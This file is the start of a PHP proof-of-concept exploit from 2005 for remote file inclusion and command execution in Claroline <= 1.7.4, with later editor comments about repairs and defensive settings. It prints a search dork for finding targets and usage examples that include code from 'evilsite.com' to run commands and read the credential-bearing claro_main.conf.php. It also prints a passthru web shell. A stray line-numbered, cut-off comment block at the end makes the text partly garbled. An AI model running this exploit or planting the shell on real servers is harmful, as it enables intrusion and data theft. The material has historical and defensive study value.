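#!/usr/bin/php -q -d short_open_tag=on
<?php
// Banner and usage text of a historical Claroline <= 1.7.4 proof of concept
// (rgod, 2005). Repaired from extraction damage: the U+2212 "minus sign"
// that had replaced ASCII '-' in the shebang flags and the -p/-P option
// examples is restored, and typographic quotes around the single-quoted
// literals are restored to PHP single quotes so the file parses at all.
//
// The preconditions the banner names are the defender's checklist:
// register_globals was removed in PHP 5.4 entirely, and allow_url_fopen /
// allow_url_include should stay off on any host that does not need remote
// stream wrappers; either setting alone breaks the include this PoC relies on.
echo "Claroline <= 1.7.4 \"scormExport.inc.php\" remote cmmnds xctn\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "-> works with register_globals = On & allow_url_fopen = On\r\n\r\n";
echo "dork: \"Powered by Claroline\" -demo\r\n\r\n";

// Usage: host, path and location are positional, followed by at least one
// command word; fewer than four arguments after the script name prints the
// help text and exits. The option letters are presumably parsed further down
// the file (outside this view), so they must be plain ASCII '-' here.
if ($argc < 5) {
echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to claroline\r\n";
echo "location: arbitrary location with the code to include\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls -la\r\n";
echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat ./..\r\n";
echo "/../inc/conf/claro_main.conf.php -p81\r\n";
echo "php ".$argv[0]." target.com / http://evilsite.com uname -a -P1.1.1.1:80\r\n\r\n";
echo "note, on remote location you need a\r\n";
echo "/lib/fileUpload.lib.php/index.html\r\n";
echo "or a\r\n";
echo "/lib/pclzip/pclzip.lib.php/index.html\r\n";
echo "with this code inside:\r\n\r\n";
// The snippet below is printed verbatim as published (only the quote
// characters were repaired); its content is part of the program's output.
echo "<?php\r\n";
echo 'if (get_magic_quotes_gpc()){$_GET[cmd]=strisplashes($_GET[cmd]);}'."\r\n";
echo "error_reporting(0);\r\n";
echo 'ini_set("max_execution_time",0);'."\r\n";
echo 'echo "*delim*";'."\r\n";
echo 'passthru($_GET[cmd]);'."\r\n";
echo 'echo "*delim*";'."\r\n";
echo "die;\r\n";
echo '?>'."\r\n";
die;
}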
38
39 /*
40 explanation:
41 software site: http://www.claroline.net/
42 description: Claroline is a free application based on PHP/MySQL allowing
43 teachers or education organizations to create and administrate
44 courses through the web.
45
46 vulnerabilities:
47
48 i) system disclosure:
49 without to have an account you can see (not modify or include) all fil